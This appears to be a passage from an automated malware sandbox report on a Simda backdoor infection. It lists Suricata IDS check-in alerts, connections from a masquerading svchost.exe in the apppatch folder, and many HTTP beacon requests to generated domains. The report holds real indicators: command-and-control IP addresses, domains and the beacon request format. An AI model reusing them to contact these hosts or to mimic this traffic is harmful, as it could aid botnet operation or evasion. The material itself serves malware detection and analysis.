    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:49733 -> 64.225.91.73:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:62554 -> 72.52.179.174:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:62556 -> 72.52.179.174:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:50108 -> 178.162.217.107:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:49724 -> 13.248.169.48:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:50110 -> 178.162.217.107:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:49732 -> 76.223.67.189:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:58380 -> 52.34.198.229:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:60003 -> 44.221.84.105:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:50109 -> 75.2.71.199:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:60709 -> 199.191.50.83:80
    Source: Network trafficSuricata IDS: 2021022 - Severity 1 - ET MALWARE Wapack Labs Sinkhole DNS Reply : 1.1.1.1:53 -> 192.168.2.8:55157
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:60694 -> 75.2.71.199:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:60695 -> 44.221.84.105:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:60702 -> 44.221.84.105:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:50113 -> 91.195.240.19:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:50106 -> 199.59.243.227:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:60710 -> 3.94.10.34:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:60673 -> 72.52.179.174:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:60690 -> 75.2.71.199:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:50118 -> 103.224.182.252:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:50107 -> 162.255.119.102:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:60687 -> 188.114.96.3:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:57740 -> 188.114.96.3:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:60669 -> 72.52.179.174:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:50117 -> 103.224.212.210:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:54073 -> 162.255.119.102:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:60696 -> 188.114.96.3:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:60698 -> 188.114.96.3:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:60701 -> 23.253.46.64:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:57727 -> 199.59.243.227:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:57739 -> 154.212.231.82:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:57726 -> 188.114.96.3:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:57732 -> 18.208.156.248:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:57736 -> 208.100.26.245:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:57728 -> 44.221.84.105:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:54072 -> 178.162.203.202:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:57730 -> 75.2.71.199:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:57735 -> 75.2.71.199:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:57734 -> 199.191.50.83:80
    Source: Network trafficSuricata IDS: 2021022 - Severity 1 - ET MALWARE Wapack Labs Sinkhole DNS Reply : 1.1.1.1:53 -> 192.168.2.8:58292
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:60700 -> 208.100.26.245:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:57737 -> 91.195.240.19:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:57731 -> 3.94.10.34:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:57729 -> 208.100.26.245:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:57733 -> 44.221.84.105:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:49729 -> 188.114.96.3:443
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:57741 -> 188.114.96.3:443
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:49719 -> 75.2.71.199:443
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:49720 -> 188.114.96.3:443
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:50114 -> 188.114.96.3:443
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:50115 -> 188.114.96.3:443
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:50116 -> 188.114.96.3:443
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:50112 -> 75.2.71.199:443
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:49723 -> 188.114.96.3:443
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:50111 -> 188.114.96.3:443
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:57738 -> 188.114.96.3:443
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.8:49731 -> 188.114.96.3:443
    System process connects to network (likely due to code injection or exploit)
    Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 178.162.217.107 80Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 106.15.232.163 8000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 3.94.10.34 80Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 64.190.63.136 80Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeDomain query: gatyvyz.com
    Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 72.52.179.174 80Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 178.162.203.202 80Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 154.85.183.50 80Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 64.225.91.73 80Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 52.34.198.229 80Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 75.2.71.199 80Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 103.150.10.48 80Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 199.191.50.83 80Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 13.248.169.48 80Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 103.224.212.210 80Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 76.223.67.189 80Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 18.208.156.248 80Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 199.59.243.227 80Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 208.100.26.245 80Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 103.224.182.252 80Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 91.195.240.19 80Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 162.255.119.102 80Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 44.221.84.105 80Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 154.212.231.82 80Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 188.114.96.3 443Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeDomain query: lyvytud.com
    Queries Google from non browser process on port 80
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyqah.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lymyxid.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: galyqaz.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vojyqem.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyfus.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: puzylyp.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qetyfuv.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyfus.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: www.gahyqah.com Connection: Keep-Alive
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vonypom.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vocyzit.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyniw.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyniw.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: pupydeq.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lysyvan.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lygynud.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: pupycag.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyrysor.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyrysor.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lysyvan.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qexyhuv.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: galynuh.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vofycot.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyxynyx.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyval.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyciz.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php?sub1=20241112-0433-1952-9852-0a12b0cc4551 HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: ww16.vofycot.com Connection: Keep-Alive Cookie: __tad=1731346399.8350699
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyval.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php?subid1=20241112-0433-1952-8ae5-52e851fd8a3a HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: ww25.lyxynyx.com Connection: Keep-Alive Cookie: __tad=1731346399.2937263
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qetyhyg.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyhub.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyhub.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lygyvuj.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyhiz.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vojyqem.com Cookie: parking_session=b5c85606-7b7e-4cde-a75c-fbd25dd3c807
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyqah.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyfus.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyniw.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: puzylyp.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyfus.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyniw.com
